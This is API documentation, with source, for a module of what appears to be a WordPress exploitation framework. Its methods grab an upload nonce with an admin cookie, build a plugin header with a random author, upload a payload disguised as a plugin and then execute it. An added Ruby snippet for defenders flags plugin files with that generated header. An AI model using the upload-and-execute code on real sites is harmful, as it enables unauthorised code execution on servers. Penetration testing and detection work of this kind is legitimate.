Module: Wpxf::WordPress::Plugin

Included in:
Xss
Defined in:
lib/wpxf/wordpress/plugin.rb

Overview

Provides functionality required to interact with the plugin system.

Instance Method Details

#fetch_plugin_upload_nonce(cookie) ⇒ String?

Retrieve a valid nonce to use for plugin uploads.

Parameters:

  • cookie (String)

    a valid admin session cookie.

Returns:

  • (String, nil)

    the nonce, nil on error.



# File 'lib/wpxf/wordpress/plugin.rb', line 8

def fetch_plugin_upload_nonce(cookie)
  res = execute_get_request(url: wordpress_url_plugin_upload, cookie: cookie)
  return nil unless res&.code == 200
  res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
end

#generate_wordpress_plugin_header(plugin_name) ⇒ String

Generate a valid WordPress plugin header / base file.

Parameters:

  • plugin_name (String)

    the name of the plugin.

Returns:

  • (String)

    a PHP script with the appropriate meta data.



# File 'lib/wpxf/wordpress/plugin.rb', line 50

def generate_wordpress_plugin_header(plugin_name)
  ['<?php',
   '/**',
   "* Plugin Name: #{plugin_name}",
   "* Version: #{_generate_wordpress_plugin_version}",
   "* Author: #{Wpxf::Utility::Text.rand_alpha(10)}",
   "* Author URI: http://#{Wpxf::Utility::Text.rand_alpha(10)}.com",
   '* License: GPL2',
   '*/',
   '?>'].join("\n")
end
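
For defenders, the header produced above has a recognisable shape: a ten-letter author, an `http://<ten letters>.com` author URI, exactly five fields, and no code after the comment. The following is an added example, not Wpxf code, that scores a plugin base file against those traits. It assumes `rand_alpha(10)` yields ten ASCII letters; the function names, the three-indicator threshold and both sample files are constructed for illustration.

```ruby
# Added defensive example (not Wpxf code): flag plugin base files whose header
# matches the shape produced by generate_wordpress_plugin_header.
# Assumption: Text.rand_alpha(10) yields exactly ten ASCII letters.
RAND_AUTHOR     = /\A[A-Za-z]{10}\z/
RAND_AUTHOR_URI = %r{\Ahttp://[A-Za-z]{10}\.com\z}
GENERATED_KEYS  = ['author', 'author uri', 'license', 'plugin name', 'version'].freeze

# Parse the "Key: value" lines of the first PHP block comment into a Hash.
def parse_plugin_header(php_source)
  comment = php_source[%r{/\*+(.*?)\*/}m, 1]
  return {} if comment.nil?

  comment.each_line.each_with_object({}) do |line, fields|
    key, value = line.sub(/\A\s*\*?\s*/, '').split(':', 2)
    fields[key.strip.downcase] = value.strip unless value.nil?
  end
end

# Return the indicators (as symbols) that the file matches.
def generated_header_indicators(php_source)
  h = parse_plugin_header(php_source)
  # What is left once the header comment and the PHP tags are removed.
  rest = php_source.sub(%r{/\*+.*?\*/}m, '').gsub(/<\?php|\?>/, '').strip
  hits = []
  hits << :random_author     if h['author'].to_s.match?(RAND_AUTHOR)
  hits << :random_author_uri if h['author uri'].to_s.match?(RAND_AUTHOR_URI)
  hits << :minimal_field_set if h.keys.sort == GENERATED_KEYS
  hits << :header_only_file  if !h.empty? && rest.empty?
  hits
end

# One indicator alone is weak (a real author name can be ten letters long),
# so require at least three before flagging. The threshold is an assumption.
def likely_generated_header?(php_source)
  generated_header_indicators(php_source).size >= 3
end

# Constructed samples: one in the generated shape, one ordinary plugin file.
GENERATED_SAMPLE = ['<?php', '/**', '* Plugin Name: abcde', '* Version: 1.2.3',
                    '* Author: qwertyuiop', '* Author URI: http://asdfghjklz.com',
                    '* License: GPL2', '*/', '?>'].join("\n")
LEGIT_SAMPLE = ['<?php', '/*', ' * Plugin Name: Example Gallery',
                ' * Description: Constructed sample plugin.', ' * Version: 1.4.2',
                ' * Author: Widgetcorp', ' * Author URI: https://example.org',
                ' * License: GPL2', ' */', "add_action('init', 'example_gallery_init');"].join("\n")

puts "generated: #{generated_header_indicators(GENERATED_SAMPLE).inspect}"
puts "legit:     #{generated_header_indicators(LEGIT_SAMPLE).inspect}"
```

Run it over each `wp-content/plugins/*/*.php` base file and review anything flagged alongside the plugin-upload entries in the web server access log.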

#upload_payload_as_plugin(name, payload_name, cookie) ⇒ Boolean

Create and upload a plugin that encapsulates the current payload.

Parameters:

  • name (String)

    the name of the plugin.

  • payload_name (String)

    the name the payload should use on the server.

  • cookie (String)

    a valid admin session cookie.

Returns:

  • (Boolean)

    true on success, false on error.



# File 'lib/wpxf/wordpress/plugin.rb', line 19

def upload_payload_as_plugin(name, payload_name, cookie)
  nonce = fetch_plugin_upload_nonce(cookie)
  return false if nonce.nil?

  res = _upload_plugin(name, payload_name, cookie, nonce)
  res&.code == 200
end

#upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie) ⇒ HttpResponse?

Upload and execute a payload as a plugin.

Parameters:

  • plugin_name (String)

    the name of the plugin.

  • payload_name (String)

    the name the payload should use on the server.

  • cookie (String)

    a valid admin session cookie.

Returns:



# File 'lib/wpxf/wordpress/plugin.rb', line 32

def upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie)
  unless upload_payload_as_plugin(plugin_name, payload_name, cookie)
    emit_error 'Failed to upload the payload'
    return nil
  end

  payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
  emit_info "Executing the payload at #{payload_url}..."
  res = execute_get_request(url: payload_url)

  has_body = res&.code == 200 && !res.body.strip.empty?
  emit_success "Result: #{res.body}" if has_body
  res
end